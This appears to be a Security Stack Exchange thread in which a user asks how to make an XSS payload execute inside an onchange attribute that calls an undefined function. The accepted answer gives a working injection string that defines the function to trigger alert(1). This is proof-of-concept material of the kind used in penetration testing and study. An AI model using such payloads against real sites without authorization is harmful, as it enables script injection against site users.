# JS bug is stopping my xss payload to exeute

Tags: xss, javascript

The XSS vector is at the * but the function issue_type is not declared hence my payload is not getting executed.

following is the instance of the vulnerable code:-

```
<select  name="sub_subissues" id="_subsubissues" onchange="issue_type(this, *)" style="height:30px;">
```

so I tried:-

issue_id=alert(1)

which resulted into:-

```
<select  name="sub_subissues" id="_subsubissues" onchange="issue_type(this, alert(1))" style="height:30px;">
```

as function issue_type is not defined in the page the payload did not execute as the onchange attribute did not execute.
The characters `<>&"'` cannot be used as they are encoded

How can i modify my payload to exploit xss?

Comment: **The issue** is the `issue_type` fun is **not defined** on the page. **Your payload** is not executed. **The solution** is **to define** `issue_type` fun yourself and include your `payload`. [MDN Web Docs: Introduction to events](https://developer.mozilla.org/en-US/docs/Learn/JavaScript/Building_blocks/Events), [Functions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Functions#function_declaration_vs_function_expression), [OWASP: XSS](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).

Comment: This is a pure programming question and is off-topic on Security SE.

Comment: Coercing data into code execution in abnormal ways is not programming in the traditional sense.  It's largely a problem in the exploitation space which makes it more related to security than the other SE verticals imho.

Answer (score 0, accepted):

As you noticed, the payload currently doesn't work, as you will get a function not defined error:

```
Uncaught ReferenceError: issue_type is not defined
```

The solution is to define the function yourself. As it doesn't matter if the function is defined before or after it is used, you can do so by injecting `1);function issue_type(){alert(1)}//`, which will give you something like this:

```
<select  name="sub_subissues" id="_subsubissues" onchange="issue_type(this, 1);function issue_type(){alert(1)}//,1);" style="height:30px;">
<option>1</option>
<option>2</option>
</select>
```

As the function is now defined, the JavaScript will work & the payload will trigger.